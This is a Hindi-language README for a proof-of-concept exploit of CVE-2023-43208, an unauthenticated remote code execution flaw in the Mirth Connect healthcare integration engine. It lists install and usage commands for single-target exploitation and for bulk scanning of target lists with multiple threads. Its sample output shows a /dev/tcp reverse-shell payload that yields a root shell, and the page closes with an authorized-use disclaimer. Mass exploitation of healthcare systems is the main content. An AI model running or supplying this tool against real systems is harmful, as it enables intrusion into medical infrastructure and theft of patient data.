
XML डिसीरियलाइज़ेशन के माध्यम से Mirth Connect में CVE-2023-43208 के लिए अप्रमाणित RCE शोषण, संस्करण पहचान, बल्क स्कैनिंग, और इंटरैक्टिव PTY शेल के साथ।
CVE-2023-43208 के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण, Mirth Connect के
4.4.1से पहले के संस्करणों में एक अप्रमाणित रिमोट कोड निष्पादन भेद्यता।
Mirth Connect एक व्यापक रूप से तैनात ओपन-सोर्स हेल्थकेयर इंटीग्रेशन इंजन है। यह भेद्यता /api/users एंडपॉइंट के माध्यम से एक Java डिसेरियलाइज़ेशन दोष का लाभ उठाती है, जो अप्रमाणित RCE प्राप्त करने के लिए Apache Commons Collections गैजेट्स की श्रृंखला बनाने वाले क्राफ्टेड XML पेलोड का उपयोग करती है।
उन्नत संस्करण मूल pwncat लिसनर को Python बिल्टिन्स (socket, select, , ) का उपयोग करके पूरी तरह से डिपेंडेंसी-फ्री इंटरैक्टिव PTY शेल से बदल देता है। कनेक्शन पर शेल स्वचालित रूप से पूर्ण PTY में अपग्रेड हो जाता है।
ttytermios| सॉफ्टवेयर | असुरक्षित संस्करण | सुधारित संस्करण |
|---|---|---|
| Mirth Connect | < 4.4.1 | 4.4.1+ |
python3/python/script फ़ॉलबैक)stty rows/cols)pwncat डिपेंडेंसी नहीं — लिसनर के लिए केवल stdlibgit clone https://github.com/yourrepo/CVE-2023-43208
cd CVE-2023-43208
pip install -r requirements.txt
requests
packaging
rich
alive-progress
python3 CVE-2023-43208.py -u https://<TARGET> -lh <YOUR_IP> -lp <PORT>
python3 CVE-2023-43208.py -u https://<TARGET> -lh <YOUR_IP> -lp <NGROK_PORT> -bp <LOCAL_PORT>
python3 CVE-2023-43208.py -f targets.txt -t 50 -o vulnerable.txt
| फ़्लैग | विवरण |
|---|---|
-u, --url | लक्ष्य URL |
-lh, --lhost | आपका लिसनिंग IP |
-lp, --lport | आपका लिसनिंग पोर्ट |
-bp, --bindport | बाइंड पोर्ट ओवरराइड (ngrok के साथ उपयोगी) |
-f, --file | लक्ष्य URL की सूची वाली फ़ाइल |
-o, --output | असुरक्षित लक्ष्यों को फ़ाइल में सहेजें |
-t, --threads | स्कैनिंग के लिए थ्रेड्स की संख्या (डिफ़ॉल्ट: 50) |
[*] Setting up listener on 10.10.15.202:4444 and launching exploit...
[*] Waiting for incoming connection on port 4444...
[*] Looking for Mirth Connect instance...
[+] Found Mirth Connect instance
[+] Vulnerable Mirth Connect version 4.4.0 instance found at https://10.129.5.3
[!] sh -c $@|sh . echo bash -c '0<&53-;exec 53<>/dev/tcp/...'
[*] Launching exploit against https://10.129.5.3...
[+] Received connection from 10.129.5.3:59640
[+] Shell opened! Upgrading to PTY...
root@mirth:/#
यह उपकरण केवल अधिकृत पेनिट्रेशन टेस्टिंग और शैक्षिक उद्देश्यों के लिए है।
उन सिस्टमों के विरुद्ध अनधिकृत उपयोग जिनके आप मालिक नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति नहीं है, अवैध है।
लेखक इस उपकरण के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं हैं।